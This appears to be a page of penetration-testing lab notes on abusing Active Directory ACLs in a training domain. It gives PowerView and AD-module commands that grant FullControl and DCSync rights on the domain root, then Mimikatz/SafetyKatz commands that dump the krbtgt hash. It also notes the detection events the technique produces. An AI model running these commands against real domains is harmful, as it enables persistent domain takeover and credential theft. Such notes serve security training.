# Rights Abuse

## Rights Abuse - using ACLs 

* It is dangerous as MDI detect the activity when we do DCSync using this.
* We make changes to the Domain Object ACL, which gives 4662 logs with a message (write DACL perform on the object) which will be visible in Security Logs.
* There are even more interesting ACLs which can be abused.
* For example, with DA privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run "DCSync".

Add FullControl rights -

{% code overflow="wrap" %}

```
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

{% endcode %}

Using ActiveDirectory Module and RACE -

{% code overflow="wrap" %}

```
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose
```

{% endcode %}

Add rights for DCSync -

{% code overflow="wrap" %}

```
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

{% endcode %}

Execute DCSync -

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

 or
 
 C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

### Rights Abuse (In this case, Replication rights to abuse DCSync)